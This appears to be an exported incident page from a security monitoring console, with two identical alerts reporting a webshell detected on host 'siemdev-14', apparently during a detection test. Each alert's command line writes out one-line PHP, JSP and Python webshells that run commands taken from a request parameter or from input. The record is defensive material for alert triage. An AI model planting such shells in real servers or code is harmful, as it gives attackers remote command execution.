Back to list

Medium CINC-20251220-A341ABA4 new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:18069325570

Incident ID CINC-20251220-A341ABA4

Severity Medium (70)

Status new

Alert Count 2

Host Count 1

First Seen 2025-12-20 08:40:19

Last Seen 2025-12-20 08:40:19

Duration 0d 0h 0m

Created 2025-12-20 13:23

Updated 2026-01-13 15:14

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...

Observed Tactics:

Techniques:

Severity	Status	Hostname	Description	Tactic	Command Line	Time
High	new	siemdev-14	A webshell has been detected on your host. It may provide adversaries a set of functions to execute or a command-line interface on the system. Please check the process tree to determine if malicious commands were executed or if this access was expected.	Persistence	bash -c echo "=== PHP WebShell ===" echo "<?php system(\$_GET[\"cmd\"]); ?>" > /tmp/shell.php cat /tmp/shell.php rm -f /tmp/shell.php echo "=== JSP WebShell ===" echo "<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>" > /tmp/shell.jsp cat /tmp/shell.jsp rm -f /tmp/shell.jsp echo "=== Python WebShell ===" echo "import os; os.system(input())" > /tmp/shell.py cat /tmp/shell.py rm -f /tmp/shell.py echo "Done"	12-20 08:40
High	new	siemdev-14	A webshell has been detected on your host. It may provide adversaries a set of functions to execute or a command-line interface on the system. Please check the process tree to determine if malicious commands were executed or if this access was expected.	Persistence	bash -c echo "=== PHP WebShell ===" echo "<?php system(\$_GET[\"cmd\"]); ?>" > /tmp/shell.php cat /tmp/shell.php rm -f /tmp/shell.php echo "=== JSP WebShell ===" echo "<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>" > /tmp/shell.jsp cat /tmp/shell.jsp rm -f /tmp/shell.jsp echo "=== Python WebShell ===" echo "import os; os.system(input())" > /tmp/shell.py cat /tmp/shell.py rm -f /tmp/shell.py echo "Done"	12-20 08:40